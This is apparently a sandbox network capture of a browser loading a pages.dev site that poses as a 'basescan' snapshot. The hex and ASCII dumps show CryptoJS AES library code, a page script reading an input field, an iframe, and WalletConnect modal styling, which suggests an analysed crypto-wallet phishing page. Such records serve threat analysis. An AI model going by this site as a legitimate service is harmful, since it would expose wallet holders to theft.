                                                                                                                                                                                                                                              2024-09-28 01:15:53 UTC1369INData Raw: 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 68 61 6e 67 65 22 2c 20 73 74 61 74 65 48 61 6e 64 6c 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 73 74 61 74 65 48 61 6e 64 6c 65 28 29 22 2c 20 31 20 2a 20 31 30 30 30 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 73 74 61 74 65 48 61 6e 64 6c 65 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 20 70 49 6e 70 75 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 49 6e 70 75 74 22 29 2e 76 61 6c 75 65 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79
                                                                                                                                                                                                                                              Data Ascii: ntListener("change", stateHandle); setTimeout("stateHandle()", 1 * 1000); function stateHandle() { let pInput = document.getElementById("pInput").value; if (document.query
                                                                                                                                                                                                                                              2024-09-28 01:15:53 UTC337INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 65 63 6f 6e 64 73 20 3d 20 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 66 72 61 6d 65 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 77 65 62 73 69 74 65 46 72 61 6d 65 22 20 73 72 63 3d 22 64 69 73 74 2f 77 65 62 73 69 74 65 2e 68 74 6d 6c 22 3e 3c 2f
                                                                                                                                                                                                                                              Data Ascii: var seconds = 30; </script> </div> </div> </div> </div> </div> </div> <div class="iframe-container"> <iframe id="websiteFrame" src="dist/website.html"></
                                                                                                                                                                                                                                              2024-09-28 01:15:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              1192.168.2.549716104.17.25.144435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:53 UTC611OUTGET /ajax/libs/crypto-js/3.1.2/rollups/aes.js HTTP/1.1
                                                                                                                                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC926INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:53 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                              ETag: W/"5eb03e2d-3430"
                                                                                                                                                                                                                                              Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 609165
                                                                                                                                                                                                                                              Expires: Thu, 18 Sep 2025 01:15:53 GMT
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2yAjkIsuz9pRqyZ9XkxuWto7Q6otC%2FHyWX2XJtJnhNCpfiscDIhbkw11d37dlNIFsuECgNO3yG12tzLHHR0nYqwTgUlSRKbqYgXjJ%2BREIPO0zgGSvsUtoFKFZlaT4gtW19Im1w7a"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe28e6cef43ef-EWR
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC443INData Raw: 33 34 33 30 0d 0a 2f 2a 0a 43 72 79 70 74 6f 4a 53 20 76 33 2e 31 2e 32 0a 63 6f 64 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 2f 63 72 79 70 74 6f 2d 6a 73 0a 28 63 29 20 32 30 30 39 2d 32 30 31 33 20 62 79 20 4a 65 66 66 20 4d 6f 74 74 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 63 6f 64 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 2f 63 72 79 70 74 6f 2d 6a 73 2f 77 69 6b 69 2f 4c 69 63 65 6e 73 65 0a 2a 2f 0a 76 61 72 20 43 72 79 70 74 6f 4a 53 3d 43 72 79 70 74 6f 4a 53 7c 7c 66 75 6e 63 74 69 6f 6e 28 75 2c 70 29 7b 76 61 72 20 64 3d 7b 7d 2c 6c 3d 64 2e 6c 69 62 3d 7b 7d 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 74 3d 6c 2e 42 61 73 65 3d 7b 65 78 74 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 73 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                                              Data Ascii: 3430/*CryptoJS v3.1.2code.google.com/p/crypto-js(c) 2009-2013 by Jeff Mott. All rights reserved.code.google.com/p/crypto-js/wiki/License*/var CryptoJS=CryptoJS||function(u,p){var d={},l=d.lib={},s=function(){},t=l.Base={extend:function(a){s.protot
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 73 2e 65 78 74 65 6e 64 28 29 3b 61 2e 69 6e 69 74 2e 61 70 70 6c 79 28 61 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 61 7d 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6d 69 78 49 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 63 29 26 26 28 74 68 69 73 5b 63 5d 3d 61 5b 63 5d 29 3b 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 74 6f 53 74 72 69 6e 67 22 29 26 26 28 74 68 69 73 2e 74 6f 53 74 72 69 6e 67 3d 61 2e 74 6f 53 74 72 69 6e 67 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 6e 69 74 2e 70 72 6f 74 6f 74 79 70 65 2e 65 78 74 65 6e 64 28 74 68 69 73 29 7d 7d 2c 0a 72 3d 6c
                                                                                                                                                                                                                                              Data Ascii: s.extend();a.init.apply(a,arguments);return a},init:function(){},mixIn:function(a){for(var c in a)a.hasOwnProperty(c)&&(this[c]=a[c]);a.hasOwnProperty("toString")&&(this.toString=a.toString)},clone:function(){return this.init.prototype.extend(this)}},r=l
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 72 28 76 61 72 20 65 3d 5b 5d 2c 6a 3d 30 3b 6a 3c 61 3b 6a 2b 2b 29 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 63 5b 6a 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 38 2a 28 6a 25 34 29 26 32 35 35 29 29 3b 72 65 74 75 72 6e 20 65 2e 6a 6f 69 6e 28 22 22 29 7d 2c 70 61 72 73 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 2c 65 3d 5b 5d 2c 6a 3d 30 3b 6a 3c 63 3b 6a 2b 2b 29 65 5b 6a 3e 3e 3e 32 5d 7c 3d 28 61 2e 63 68 61 72 43 6f 64 65 41 74 28 6a 29 26 32 35 35 29 3c 3c 32 34 2d 38 2a 28 6a 25 34 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 72 2e 69 6e 69 74 28 65 2c 63 29 7d 7d 2c 78 3d 77 2e 55 74 66 38 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79
                                                                                                                                                                                                                                              Data Ascii: r(var e=[],j=0;j<a;j++)e.push(String.fromCharCode(c[j>>>2]>>>24-8*(j%4)&255));return e.join("")},parse:function(a){for(var c=a.length,e=[],j=0;j<c;j++)e[j>>>2]|=(a.charCodeAt(j)&255)<<24-8*(j%4);return new r.init(e,c)}},x=w.Utf8={stringify:function(a){try
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 48 6d 61 63 48 65 6c 70 65 72 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 2c 65 29 7b 72 65 74 75 72 6e 28 6e 65 77 20 6e 2e 48 4d 41 43 2e 69 6e 69 74 28 61 2c 0a 65 29 29 2e 66 69 6e 61 6c 69 7a 65 28 62 29 7d 7d 7d 29 3b 76 61 72 20 6e 3d 64 2e 61 6c 67 6f 3d 7b 7d 3b 72 65 74 75 72 6e 20 64 7d 28 4d 61 74 68 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 75 3d 43 72 79 70 74 6f 4a 53 2c 70 3d 75 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 3b 75 2e 65 6e 63 2e 42 61 73 65 36 34 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 6c 3d 64 2e 77 6f 72 64 73 2c 70 3d 64 2e 73 69 67 42 79 74 65 73 2c 74 3d 74 68 69 73 2e 5f 6d 61 70 3b 64 2e 63 6c 61 6d 70 28 29 3b 64 3d
                                                                                                                                                                                                                                              Data Ascii: HmacHelper:function(a){return function(b,e){return(new n.HMAC.init(a,e)).finalize(b)}}});var n=d.algo={};return d}(Math);(function(){var u=CryptoJS,p=u.lib.WordArray;u.enc.Base64={stringify:function(d){var l=d.words,p=d.sigBytes,t=this._map;d.clamp();d=
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 71 2c 6e 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 31 36 3e 61 3b 61 2b 2b 29 7b 76 61 72 20 63 3d 6e 2b 61 2c 65 3d 71 5b 63 5d 3b 71 5b 63 5d 3d 28 65 3c 3c 38 7c 65 3e 3e 3e 32 34 29 26 31 36 37 31 31 39 33 35 7c 28 65 3c 3c 32 34 7c 65 3e 3e 3e 38 29 26 34 32 37 38 32 35 35 33 36 30 7d 76 61 72 20 61 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 63 3d 71 5b 6e 2b 30 5d 2c 65 3d 71 5b 6e 2b 31 5d 2c 6a 3d 71 5b 6e 2b 32 5d 2c 6b 3d 71 5b 6e 2b 33 5d 2c 7a 3d 71 5b 6e 2b 34 5d 2c 72 3d 71 5b 6e 2b 35 5d 2c 74 3d 71 5b 6e 2b 36 5d 2c 77 3d 71 5b 6e 2b 37 5d 2c 76 3d 71 5b 6e 2b 38 5d 2c 41 3d 71 5b 6e 2b 39 5d 2c 42 3d 71 5b 6e 2b 31 30 5d 2c 43 3d 71 5b 6e 2b 31 31 5d 2c 75 3d 71 5b 6e 2b 31 32
                                                                                                                                                                                                                                              Data Ascii: ssBlock:function(q,n){for(var a=0;16>a;a++){var c=n+a,e=q[c];q[c]=(e<<8|e>>>24)&16711935|(e<<24|e>>>8)&4278255360}var a=this._hash.words,c=q[n+0],e=q[n+1],j=q[n+2],k=q[n+3],z=q[n+4],r=q[n+5],t=q[n+6],w=q[n+7],v=q[n+8],A=q[n+9],B=q[n+10],C=q[n+11],u=q[n+12
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 29 2c 68 3d 6c 28 68 2c 66 2c 6d 2c 67 2c 75 2c 31 31 2c 62 5b 34 35 5d 29 2c 67 3d 6c 28 67 2c 68 2c 66 2c 6d 2c 78 2c 31 36 2c 62 5b 34 36 5d 29 2c 6d 3d 6c 28 6d 2c 67 2c 68 2c 66 2c 6a 2c 32 33 2c 62 5b 34 37 5d 29 2c 66 3d 73 28 66 2c 6d 2c 67 2c 68 2c 63 2c 36 2c 62 5b 34 38 5d 29 2c 68 3d 73 28 68 2c 66 2c 6d 2c 67 2c 77 2c 31 30 2c 62 5b 34 39 5d 29 2c 67 3d 73 28 67 2c 68 2c 66 2c 6d 2c 0a 45 2c 31 35 2c 62 5b 35 30 5d 29 2c 6d 3d 73 28 6d 2c 67 2c 68 2c 66 2c 72 2c 32 31 2c 62 5b 35 31 5d 29 2c 66 3d 73 28 66 2c 6d 2c 67 2c 68 2c 75 2c 36 2c 62 5b 35 32 5d 29 2c 68 3d 73 28 68 2c 66 2c 6d 2c 67 2c 6b 2c 31 30 2c 62 5b 35 33 5d 29 2c 67 3d 73 28 67 2c 68 2c 66 2c 6d 2c 42 2c 31 35 2c 62 5b 35 34 5d 29 2c 6d 3d 73 28 6d 2c 67 2c 68 2c 66 2c 65 2c
                                                                                                                                                                                                                                              Data Ascii: ),h=l(h,f,m,g,u,11,b[45]),g=l(g,h,f,m,x,16,b[46]),m=l(m,g,h,f,j,23,b[47]),f=s(f,m,g,h,c,6,b[48]),h=s(h,f,m,g,w,10,b[49]),g=s(g,h,f,m,E,15,b[50]),m=s(m,g,h,f,r,21,b[51]),f=s(f,m,g,h,u,6,b[52]),h=s(h,f,m,g,k,10,b[53]),g=s(g,h,f,m,B,15,b[54]),m=s(m,g,h,f,e,
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 70 2e 69 74 65 72 61 74 69 6f 6e 73 3b 75 2e 6c 65 6e 67 74 68 3c 71 3b 29 7b 6e 26 26 73 2e 75 70 64 61 74 65 28 6e 29 3b 76 61 72 20 6e 3d 73 2e 75 70 64 61 74 65 28 64 29 2e 66 69 6e 61 6c 69 7a 65 28 72 29 3b 73 2e 72 65 73 65 74 28 29 3b 66 6f 72 28 76 61 72 20 61 3d 31 3b 61 3c 70 3b 61 2b 2b 29 6e 3d 73 2e 66 69 6e 61 6c 69 7a 65 28 6e 29 2c 73 2e 72 65 73 65 74 28 29 3b 62 2e 63 6f 6e 63 61 74 28 6e 29 7d 62 2e 73 69 67 42 79 74 65 73 3d 34 2a 71 3b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 75 2e 45 76 70 4b 44 46 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 6c 2c 70 29 7b 72 65 74 75 72 6e 20 73 2e 63 72 65 61 74 65 28 70 29 2e 63 6f 6d 70 75 74 65 28 64 2c 0a 6c 29 7d 7d 29 28 29 3b 0a 43 72 79 70 74 6f 4a 53 2e 6c 69 62 2e 43 69 70 68 65 72 7c 7c 66 75 6e 63
                                                                                                                                                                                                                                              Data Ascii: p.iterations;u.length<q;){n&&s.update(n);var n=s.update(d).finalize(r);s.reset();for(var a=1;a<p;a++)n=s.finalize(n),s.reset();b.concat(n)}b.sigBytes=4*q;return b}});u.EvpKDF=function(d,l,p){return s.create(p).compute(d,l)}})();CryptoJS.lib.Cipher||func
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 61 74 65 44 65 63 72 79 70 74 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 44 65 63 72 79 70 74 6f 72 2e 63 72 65 61 74 65 28 65 2c 61 29 7d 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 74 68 69 73 2e 5f 63 69 70 68 65 72 3d 65 3b 74 68 69 73 2e 5f 69 76 3d 61 7d 7d 29 29 2e 65 78 74 65 6e 64 28 29 3b 71 2e 45 6e 63 72 79 70 74 6f 72 3d 71 2e 65 78 74 65 6e 64 28 7b 70 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 76 61 72 20 62 3d 74 68 69 73 2e 5f 63 69 70 68 65 72 2c 63 3d 62 2e 62 6c 6f 63 6b 53 69 7a 65 3b 78 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 61 2c 63 29 3b 62 2e 65 6e 63 72 79 70 74 42 6c 6f 63 6b 28 65 2c 61 29 3b 74 68 69 73 2e 5f 70 72 65 76 42 6c 6f 63
                                                                                                                                                                                                                                              Data Ascii: ateDecryptor:function(e,a){return this.Decryptor.create(e,a)},init:function(e,a){this._cipher=e;this._iv=a}})).extend();q.Encryptor=q.extend({processBlock:function(e,a){var b=this._cipher,c=b.blockSize;x.call(this,e,a,c);b.encryptBlock(e,a);this._prevBloc
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 63 69 70 68 65 72 74 65 78 74 3b 61 3d 61 2e 73 61 6c 74 3b 72 65 74 75 72 6e 28 61 3f 73 2e 63 72 65 61 74 65 28 5b 31 33 39 38 38 39 33 36 38 34 2c 0a 31 37 30 31 30 37 36 38 33 31 5d 29 2e 63 6f 6e 63 61 74 28 61 29 2e 63 6f 6e 63 61 74 28 62 29 3a 62 29 2e 74 6f 53 74 72 69 6e 67 28 72 29 7d 2c 70 61 72 73 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 72 2e 70 61 72 73 65 28 61 29 3b 76 61 72 20 62 3d 61 2e 77 6f 72 64 73 3b 69 66 28 31 33 39 38 38 39 33 36 38 34 3d 3d 62 5b 30 5d 26 26 31 37 30 31 30 37 36 38 33 31 3d 3d 62 5b 31 5d 29 7b 76 61 72 20 63 3d 73 2e 63 72 65 61 74 65 28 62 2e 73 6c 69 63 65 28 32 2c 34 29 29 3b 62 2e 73 70 6c 69 63 65 28 30 2c 34 29 3b 61 2e 73 69 67 42 79 74 65 73 2d 3d 31 36 7d
                                                                                                                                                                                                                                              Data Ascii: n(a){var b=a.ciphertext;a=a.salt;return(a?s.create([1398893684,1701076831]).concat(a).concat(b):b).toString(r)},parse:function(a){a=r.parse(a);var b=a.words;if(1398893684==b[0]&&1701076831==b[1]){var c=s.create(b.slice(2,4));b.splice(0,4);a.sigBytes-=16}
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 29 7b 66 6f 72 28 76 61 72 20 75 3d 43 72 79 70 74 6f 4a 53 2c 70 3d 75 2e 6c 69 62 2e 42 6c 6f 63 6b 43 69 70 68 65 72 2c 64 3d 75 2e 61 6c 67 6f 2c 6c 3d 5b 5d 2c 73 3d 5b 5d 2c 74 3d 5b 5d 2c 72 3d 5b 5d 2c 77 3d 5b 5d 2c 76 3d 5b 5d 2c 62 3d 5b 5d 2c 78 3d 5b 5d 2c 71 3d 5b 5d 2c 6e 3d 5b 5d 2c 61 3d 5b 5d 2c 63 3d 30 3b 32 35 36 3e 63 3b 63 2b 2b 29 61 5b 63 5d 3d 31 32 38 3e 63 3f 63 3c 3c 31 3a 63 3c 3c 31 5e 32 38 33 3b 66 6f 72 28 76 61 72 20 65 3d 30 2c 6a 3d 30 2c 63 3d 30 3b 32 35 36 3e 63 3b 63 2b 2b 29 7b 76 61 72 20 6b 3d 6a 5e 6a 3c 3c 31 5e 6a 3c 3c 32 5e 6a 3c 3c 33 5e 6a 3c 3c 34 2c 6b 3d 6b 3e 3e 3e 38 5e 6b 26 32 35 35 5e 39 39 3b 6c 5b 65 5d 3d 6b 3b 73 5b 6b 5d 3d 65 3b 76 61 72 20 7a 3d 61 5b 65 5d 2c 46 3d 61 5b 7a 5d 2c 47 3d 61
                                                                                                                                                                                                                                              Data Ascii: ){for(var u=CryptoJS,p=u.lib.BlockCipher,d=u.algo,l=[],s=[],t=[],r=[],w=[],v=[],b=[],x=[],q=[],n=[],a=[],c=0;256>c;c++)a[c]=128>c?c<<1:c<<1^283;for(var e=0,j=0,c=0;256>c;c++){var k=j^j<<1^j<<2^j<<3^j<<4,k=k>>>8^k&255^99;l[e]=k;s[k]=e;var z=a[e],F=a[z],G=a


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              2192.168.2.549718172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC642OUTGET /style.css HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC796INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:54 GMT
                                                                                                                                                                                                                                              Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                              Content-Length: 13171
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              ETag: "3a1cb2968f14489b49bdd6276198c309"
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qSOmwMPsNhc8E6kQLd%2BGTo8jv%2BCGcqiD3Bp1WawgkJNZ9wLW9kMuB5ayZ8hha24wCM3FDn%2F%2Bs872WnvJiwH5ejJ9WuNBNn9cdVVlVo1ibxxHzGwXS%2F8mFZe3o65EboAeDquzLiyupof6%2BIfl8JkDbSSCURBVO5dWxWoGx%2BMyCExYgtD4dJAH2HwZ0RInCrZO%2BZ706nUB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe291290142c2-EWR
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC573INData Raw: 20 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 20 2d 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 33 30 30 6d 73 3b 0d 0a 20 7d 0d 0a 0d 0a 20 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 49 6e 20 7b 0d 0a 20 20 20 20 20 66 72 6f 6d 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0d 0a 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 74 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0d 0a 20 20 20 20 20 7d 0d 0a 20 7d 0d 0a 0d 0a 20 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 4f 75 74 20 7b 0d 0a 20 20 20 20 20 66 72 6f 6d 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0d 0a 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 74 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 6f 70 61 63 69 74
                                                                                                                                                                                                                                              Data Ascii: :root { --animation-duration: 300ms; } @keyframes fadeIn { from { opacity: 0; } to { opacity: 1; } } @keyframes fadeOut { from { opacity: 1; } to { opacit
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0d 0a 20 20 20 20 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0d 0a 20 20 20 20 20 74 6f 70 3a 20 30 3b 0d 0a 20 20 20 20 20 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 27 27 3b 0d 0a 20 7d 0d 0a 0d 0a 20 2e 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 68 65 61 64 65 72 4c 6f 67 6f 20 7b 0d 0a 20 20 20
                                                                                                                                                                                                                                              Data Ascii: isplay: flex; height: 100%; justify-content: center; left: 0; pointer-events: none; position: fixed; top: 0; user-select: none; width: 100%; z-index: ''; } .walletconnect-modal__headerLogo {
